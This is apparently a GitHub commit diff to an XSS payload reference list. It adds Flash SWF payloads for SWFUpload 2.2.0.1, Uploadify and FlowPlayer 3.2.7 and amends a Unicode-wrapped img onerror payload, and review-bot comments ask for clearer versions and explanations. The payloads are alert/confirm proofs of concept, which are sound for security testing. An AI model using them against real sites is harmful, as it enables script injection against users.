[XSS] amend Unicode payload, add Flash SWF

Yasin Soliman 2017-10-18 16:50:27 +01:00 committed by GitHub
parent 469dda90e9
commit 39f4ab3437


@ -147,9 +147,11 @@ javas	cript://www.google.com/%0Aalert(1)
- SWFUpload 2.2.0.1: `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//`
- Uploadify (legacy): `uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf`
- FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf`
_Note: Useful reference on constructing Flash-based XSS payloads from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._
_Note: Useful reference on constructing Flash-based XSS payloads available at [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._
**Lightweight Markup Languages**
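Review bot: The Uploadify entry is labelled only "(legacy)" while the SWFUpload and FlowPlayer entries name an exact version (2.2.0.1 and 3.2.7); please state the affected Uploadify version or range so readers can tell which deployments the entry applies to. The FlowPlayer entry also hard-codes a third-party media URL over plain HTTP (`http://edge.flowplayer.org/bauhaus.mp4`), so the entry stops being reproducible if that file moves; a placeholder clip URL would be more durable. In the reworded note, consider naming the MWR Labs article by title so the reference survives if the link rots.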
@ -176,7 +178,7 @@ __ javascript:alert(document.domain)
**Unicode characters**
```html
†‡•img src=a onerror=javascript:alert('hacked')>…‰€
†‡•img src=a onerror=javascript:alert('test')>…‰€
```
**AngularJS Template Injection based XSS**
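Review bot: The amended line in the `html` block still carries no explanation of what the surrounding non-ASCII characters (`†‡•` before `img`, `…‰€` after `>`) are for, or which encoding or conversion the entry assumes, so a reader cannot tell when it applies or what normalization a filter should be tested against; please add a one-line description under the **Unicode characters** heading. The only visible change is the string inside `alert(...)`, from 'hacked' to 'test'; other entries in this file use `alert(1)` or `alert(document.domain)`, and using one of those would keep the list consistent.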